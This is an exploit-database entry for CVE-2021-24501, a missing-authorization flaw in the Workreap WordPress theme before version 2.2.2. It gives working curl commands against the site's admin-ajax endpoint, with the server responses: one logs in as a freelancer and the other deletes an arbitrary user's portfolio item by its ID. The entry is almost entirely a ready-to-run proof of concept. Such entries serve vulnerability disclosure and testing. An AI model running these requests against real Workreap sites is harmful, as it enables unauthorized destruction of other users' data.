Exploit for Workreap < 2.2.2 - Missing Authorization Checks in Ajax Actions CVE-2021-24501

Name: Exploit for Workreap < 2.2.2 - Missing Authorization Checks in Ajax Actions CVE-2021-24501
Rating: 5 (108 reviews)

2021-07-02 | CVSS 5.5

## https://sploitus.com/exploit?id=WPEX-ID:66E4AAF4-5EF7-4DA8-A45C-E24F449C363E
# log in as arbitrary freelancer
curl -c .cookies -F action=workreap_ajax_login -F username=balle -F password=hunter2 \
  http://localhost:8888/wp-admin/admin-ajax.php
{"job":"no","type":"success","role_type":"freelancers","redirect":"http:\/\/localhost:8888\/dashboard\/?ref=profile&mode=settings&identity=3","url":"http:\/\/localhost:8888\/","loggedin":true,"message":"Successfully Logged in"}%                                                                                                      haraldei@stigmata% ./poc/poc-05-portfolio-remove.sh 1364

# delete arbitrary portfolio
curl -s -b .cookies -F action=workreap_portfolio_remove -F id=1361 \
  http://localhost:8888/wp-admin/admin-ajax.php
{"type":"success","message":"Portfolio removed successfully."}